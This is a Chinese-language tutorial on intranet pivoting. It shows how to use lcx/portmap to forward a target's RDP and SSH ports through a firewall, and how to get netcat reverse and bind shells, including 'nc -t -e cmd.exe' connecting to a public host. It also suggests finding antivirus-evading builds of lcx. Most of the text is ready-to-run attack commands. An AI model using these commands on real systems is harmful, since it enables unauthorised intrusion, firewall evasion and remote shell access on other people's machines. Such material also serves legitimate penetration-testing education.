一、lcx工具
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,
Windows版使用方法如下:
1、 lcx 内网端口转发
本机IP:192.168.1.10 目标机IP:192.168.1.5
本机运行: lcx -listen 3333 2222
目标机运行:lcx -slave 192.168.1.10 3333 192.168.1.5 3389
将192.168.1.5的3389端口映射给192.168.1.10的3333端口
在本机上远程桌面连接127.0.0.1(本机自己)的2222端口,就可连接到目标机的3389端口。
从第三台机器上连接本机(192.168.1.10)的2222端口,也可以连接到目标机的3389端口。
查看本机和目标机器,可以看到,目标机器主动连接本机的3333端口,这样就绕开了目标机上的防火墙。
即使目标机器上的防火墙阻隔了3389端口,由于是目标机主动连接本机,穿透防火墙。
2、本地端口转发
-tran参数的用法
目标机上运行:lcx -tran 3333 127.0.0.1 3389
在主机上运行远程桌面,连接目标机的53端口,可以连接到主机的3389端口。
目标机上运行:lcx -tran 3333 192.168.125.102 3389 其中192.168.125.102是第三台机。
在主机上运行远程桌面,连接目标机的3333端口,可以连接到第三台机的3389端口。
由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口,
目标主机上执行:
lcx -tran 53 目标主机ip 3389
这时我们可以直接远程桌面连接到到 目标主机IP:53
注:软件可能会被杀软查杀,可自行寻找免杀版本。
Linux版使用方法:
例如:
先在具有公网ip的主机上执行:
./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
意思是监听来自6666端口的请求,将其转发到7777端口
再在内网主机上执行:
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666
意思就是将内网主机22端口的流量转发到公网主机的6666端口。
然后在Linux系统命令行下执行
ssh 公网主机ip 7777
即可连接内网主机。
另一种方法(-m 1):貌似像windows中的反向代理
./portmap -m 1 -p1 转发的公网端口 -h2 内网地址 -p2 内网服务端口
在本机主机上执行:
./portmap -m 1 -p1 5555 -h2 192.168.1.13 -p2 22
192.168.1.13为内网地址
验证
成功
二、nc工具反弹
反向连接
首先进行在公网主机监听:
nc -lvvp 4444
其次在内网主机上执行
nc -t -e cmd.exe 公网ip 4444
反弹成功
正向连接
在内网主机执行:
nc -l -p 4444 -t -e cmd.exe
在公网主机执行:
nc -vv ip(靶机地址)4444、、成功获取shell
-vv相当于参数的复用
-v 参数可以将一些关于连接建立信息输出到标准错误。-v参数多出现几次,则显示的信息会更多一些。如果-v参数没有出现,则NetCat将默默地工作,至到出现错误为止。